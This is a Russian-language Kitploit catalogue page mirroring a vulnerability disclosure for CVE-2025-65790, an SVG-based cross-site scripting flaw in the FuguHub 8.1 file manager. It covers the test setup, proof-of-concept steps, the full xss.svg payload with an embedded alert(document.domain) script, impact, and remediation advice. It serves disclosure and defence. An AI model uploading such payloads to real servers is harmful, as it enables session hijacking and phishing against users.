Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
FuguHub-8.1-Reflected-SVG-XSS-CVE-2025-65790 — Reflected Cross-Site Scripting (XSS) via SVG Rendering in FuguHub | Kitploit
Инструменты/GitHubGitHub/hunterxxx/fuguhub-8.1-reflected-svg-xss-cve-2025-65790
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingLearning & Education
GitHubhunterxxx/fuguhub-8.1-reflected-svg-xss-cve-2025-65790

FuguHub-8.1-Reflected-SVG-XSS-CVE-2025-65790

Reflected Cross-Site Scripting (XSS) via SVG Rendering in FuguHub

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
17 месяцев назадЕщё не проверено

CVE-2025-65790 - Отражённый SVG XSS в FuguHub 8.1

Отражённый межсайтовый скриптинг (XSS) через рендеринг SVG в FuguHub

https://www.cve.org/CVERecord?id=CVE-2025-65790

Этот репозиторий документирует уязвимость отражённого межсайтового скриптинга (XSS) в FuguHub 8.1, где SVG-файлы, содержащие встроенный JavaScript, выполняются при просмотре через встроенный файловый менеджер /fs/.

Назначен CVE: CVE-2025-65790
Обнаружено: Han Tek Foo
Серьёзность: Высокая
Воздействие: Выполнение произвольного JavaScript

Введение

FuguHub — это облачный медиасервер, разработанный Real Time Logic / Sesamt Data AB. В ходе тестирования установки по умолчанию была выявлена уязвимость отражённого межсайтового скриптинга (XSS) в обработке SVG-файлов, обслуживаемых встроенным файловым менеджером FuguHub. Вредоносный JavaScript, встроенный в SVG-файл, выполняется автоматически при открытии файла через интерфейс /fs/. Это позволяет удалённым злоумышленникам выполнять произвольный JavaScript в браузере жертвы.

Тестовая среда

Операционная система: Debian Linux (чистая установка)

Версия FuguHub: Последняя загрузка по состоянию на 2025-11-12

Проверенный URL:

http://127.0.0.1/fs/

FuguHub не отображает номер версии в пользовательском интерфейсе. Тестирование проводилось на чистой установке, напрямую с официальной страницы загрузки.

Подтверждение концепции

Сначала загрузите и запустите последнюю версию FuguHub:

wget https://fuguhub.com/install/FuguHub.linux.install

chmod +x FuguHub.linux.install

sudo ./FuguHub.linux.install

  1. Перейдите в раздел Web-File-Server и откройте Web File Manager:

alt text

  1. В Web File Manager загрузите xss.svg:

alt text

  1. xss.svg успешно загружен:

alt text

  1. При щелчке на xss.svg браузер запускает XSS, и всплывающее окно показывает домен “127.0.0.1” через alert(document.domain), что подтверждает отражённый XSS.

alt text

Ниже приведён код xss.svg, который я использовал в PoC:

root@kitploit:~
<svg xmlns="http://www.w3.org/2000/svg" width="400" height="400" viewBox="0 0 124 124" fill="none">
<rect width="124" height="124" rx="24" fill="#000000"/>
   <script type="text/javascript">  
      alert(document.domain);
   </script>
</svg>

🧩 Коренная причина

FuguHub обслуживает SVG-файлы напрямую без очистки или фильтрации скриптов. Браузеры обрабатывают SVG как активный XML-контент и выполняют встроенные элементы <script>, что приводит к отражённому XSS.

🛡 Воздействие

Выполнение JavaScript под контролем злоумышленника может привести к:

  • Перехвату учётных данных/сессий (если cookies не HttpOnly)
  • Манипуляциям с интерфейсом, фишинг
  • Принудительным действиям пользователя в приложении
  • Расширению поверхности атак на других пользователей

🛠 Рекомендации по устранению

  • Удалите теги <script> и атрибуты событий из SVG-файлов
  • Отключите выполнение встроенных скриптов или примените песочницу (sandbox)
  • Примените строгую политику безопасности контента (Content-Security-Policy, CSP)
  • Ограничьте загрузку SVG или конвертируйте в растровые изображения (PNG)
  • Очистите/обработайте SVG перед обслуживанием через /fs/

🏷 Информация о CVE

Эта проблема была назначена CVE-2025-65790 от MITRE.

Чтобы перевести статус CVE из RESERVED → PUBLIC, этот репозиторий предоставлен MITRE в качестве публичной ссылки.

Благодарности

Обнаружено:
Han Tek Foo

Скачать инструмент